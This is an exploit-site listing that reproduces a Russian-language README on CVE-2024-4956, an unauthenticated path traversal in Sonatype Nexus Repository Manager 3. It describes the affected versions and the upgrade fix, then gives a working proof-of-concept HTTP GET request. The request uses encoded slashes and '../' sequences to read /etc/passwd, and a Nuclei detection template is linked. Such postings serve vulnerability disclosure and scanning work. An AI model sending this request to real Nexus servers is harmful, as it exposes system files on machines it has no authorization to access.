Sploitus

Exploit for CVE-2024-4956

kitploit · 2026-08-27

Exploit Code

MARKDOWN53 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ERICKFERNANDOX-CVE-2024-4956
# CVE-2024-4956 - Неавторизованный обход пути в Nexus Repository Manager 3

Nexus Repository Manager — это менеджер репозиториев, который организует, хранит и распространяет артефакты, необходимые для разработки.

Уязвимость обхода пути была обнаружена в Nexus Repository 3, в версиях до 3.68.1. Эта уязвимость позволяет злоумышленнику создать URL-адрес для загрузки системных файлов за пределами области приложения Nexus Repository без какой-либо аутентификации. Это представляет значительный риск, так как может раскрыть конфиденциальные системные файлы и потенциально поставить под угрозу безопасность среды, где установлен Nexus Repository.

Рекомендуется как можно скорее обновить Nexus Repository до версии 3.68.1 или новее, чтобы устранить эту уязвимость.

Для получения дополнительной информации и технических деталей об уязвимости обратитесь к следующей ссылке:

Ссылки:

  * https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16



## Уязвимые версии

Уязвимость затрагивает версии с 3.0 по 3.68.0 Sonatype Nexus Repository Manager.

### Устранение:

Обновление Nexus Repository является рекомендуемым подходом для устранения этой уязвимости. Однако для развертываний, которые не могут быть сразу обновлены, доступны варианты немедленного смягчения:

Ссылки:

  * https://support.sonatype.com/hc/en-us/articles/29412417068819



## PoC

root@kitploit:~
    
    
    GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
    Host: localhost
    Accept-Encoding: gzip, deflate, br
    Accept: */*
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    

С помощью приведенного выше PoC можно увидеть, как происходит доступ к файлу /etc/passwd:

![](https://assets.kitploit.com/production/public/readmes/25188/9d0e5381a2aa35b5fa4c5488d3768a406401a776b4f0f2e6367fc2a0f57413ab.png)

## Шаблон Nuclei

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml